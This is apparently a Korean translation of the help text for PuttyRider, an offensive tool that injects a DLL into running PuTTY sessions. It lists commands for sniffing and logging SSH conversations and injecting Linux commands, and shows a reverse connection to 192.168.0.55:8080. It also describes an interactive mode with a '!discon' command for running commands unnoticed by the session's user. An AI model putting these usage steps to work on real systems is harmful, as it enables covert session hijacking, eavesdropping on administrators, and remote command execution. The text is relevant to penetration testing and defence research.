
Putty 세션을 하이잭하여 대화를 스니핑하고 리눅스 명령어를 주입합니다.
Putty 세션을 가로채서 대화를 스니핑하고 Linux 명령을 주입합니다.
실행 중인 Putty 프로세스와 그 상태(주입됨/주입되지 않음)를 나열합니다.
PuttyRider.exe -l
첫 번째로 발견된 putty.exe에 DLL을 주입하고 DLL에서 내 IP:Port로 역방향 연결을 시작한 후 PuttyRider.exe를 종료합니다.
PuttyRider.exe -p 0 -r 192.168.0.55:8080
백그라운드에서 실행되고 새 Putty 프로세스를 기다립니다. 새 putty.exe에 모두 주입하고 모든 대화를 로컬 파일에 기록합니다.
PuttyRider.exe -w -f
이미 주입된 모든 Putty 프로세스에서 PuttyRider.dll을 제거합니다. (-w 모드에서 실행 중이라면 PuttyRider.exe를 종료하는 것을 잊지 마십시오. 그렇지 않으면 다시 주입됩니다.)
PuttyRider.exe -x
Operation modes:
-l 실행 중인 Putty 프로세스와 그 연결을 나열합니다.
-w 모든 기존 Putty 세션에 주입하고 새 세션이 오면 그 세션에도 주입하기 위해 대기합니다.
-p PID PID로 식별되는 기존 Putty 세션에만 주입합니다.
PID==0이면 첫 번째로 발견된 Putty에 주입합니다.
-x 정리. 실행 중인 모든 Putty 인스턴스에서 DLL을 제거합니다.
-d 디버그 모드. -p 모드에서만 작동합니다.
-c CMD 주입 성공 후 Linux 명령을 자동으로 실행합니다.
PuttyRider는 CMD에서 후행 공백과 '&' 문자를 제거합니다.
PuttyRider는 CMD에 " 1>/dev/null 2>/dev/null &"를 추가합니다.
-h 이 도움말을 출력합니다.
Output modes:
-f 모든 Putty 대화를 로컬 디렉터리의 파일에 기록합니다.
파일 이름에는 현재 putty.exe의 PID가 추가됩니다.
-r IP:PORT 지정된 머신으로 역방향 연결을 시작하고
대화형 세션을 시작합니다.
Interactive commands (역방향 연결을 받은 후):
!status Putty 창이 사용자 입력에 연결되어 있는지 확인합니다.
!discon 주 Putty 창을 연결 해제하여 아무것도 표시하지 않도록 합니다.
사용자가 알아차리지 못하도록 명령을 보내는 데 유용합니다.
!recon Putty 창을 정상 작동 모드로 다시 연결합니다.
CMD Linux 셸 명령
!exit 이 연결을 종료합니다.
!help 클라이언트 연결 도움말을 표시합니다.
Visual Studio 명령 프롬프트를 사용하세요:
nmake main dll
Insomnia Security의 Brett Moore가 작성한 개념 증명 PuttyHijack에 감사드립니다.